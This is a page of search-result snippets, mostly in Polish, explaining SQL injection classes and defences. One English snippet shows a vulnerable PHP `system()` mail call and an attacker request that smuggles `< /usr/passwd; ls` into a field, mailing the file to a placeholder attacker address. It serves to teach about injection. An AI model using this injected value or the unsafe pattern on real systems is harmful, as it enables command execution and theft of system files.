Search results
Jako boczne wstrzykiwanie kodu SQL określa się grup ataków, które wymierzone sę ą w kod PL/SQL. Wskazano również, jak bronić się przed tego rodzaju atakami.
Wykonane są w językach (np. C, Cobol, Pascal) rozszerzonych o możliwość łączenia z SQL (embedded SQL) Korzystają ze specjalnego interfejsu (np. ODBC/JDBC), który pozwala wysyłać do bazy zapytania sformułowane w SQL.
16 cze 2010 · SQL Injection can be broken up into 3 classes. Inband - data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page. Out-of-Band - data is retrieved using a different channel (e.g.: an email with the ...
17 cze 2015 · SQL Injection to jeden z najbardziej niebezpiecznych ataków hackerskich. Umożliwia wykradanie wrażliwych, tajnych danych z aplikacji. Do tego potrafi spustoszyć działającą bazę danych, dla której jedynym ratunkiem jest restore z utworzonego wcześniej backupu.
Gdy strona wydaje się być podatna na SQL injection (SQLi) z powodu nietypowych odpowiedzi serwera na dane wejściowe związane z SQLi, pierwszym krokiem jest zrozumienie, jak wstrzyknąć dane do zapytania bez zakłócania go. Wymaga to skutecznego zidentyfikowania metody ucieczki z bieżącego kontekstu. Oto kilka przydatnych przykładów:
Code injection using system() Example: PHP server-side code for sending email. $email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $email –s $subject < /tmp/joinmynetwork”) Attacker can post. http://yourdomain.com/mail.php? email=hacker@hackerhome.net & subject=foo < /usr/passwd; ls. OR.
Możemy klasyfikować typy iniekcji SQL na podstawie metod, z których korzystają, aby uzyskać dostęp do danych backendowych i ich potencjalnego uszkodzenia. Wstrzyknięcia SQL są generalnie podzielone na następujące kategorie: In-band SQLi (klasyczny), Inferential SQLi (Blind) i Out-of-band SQLi.
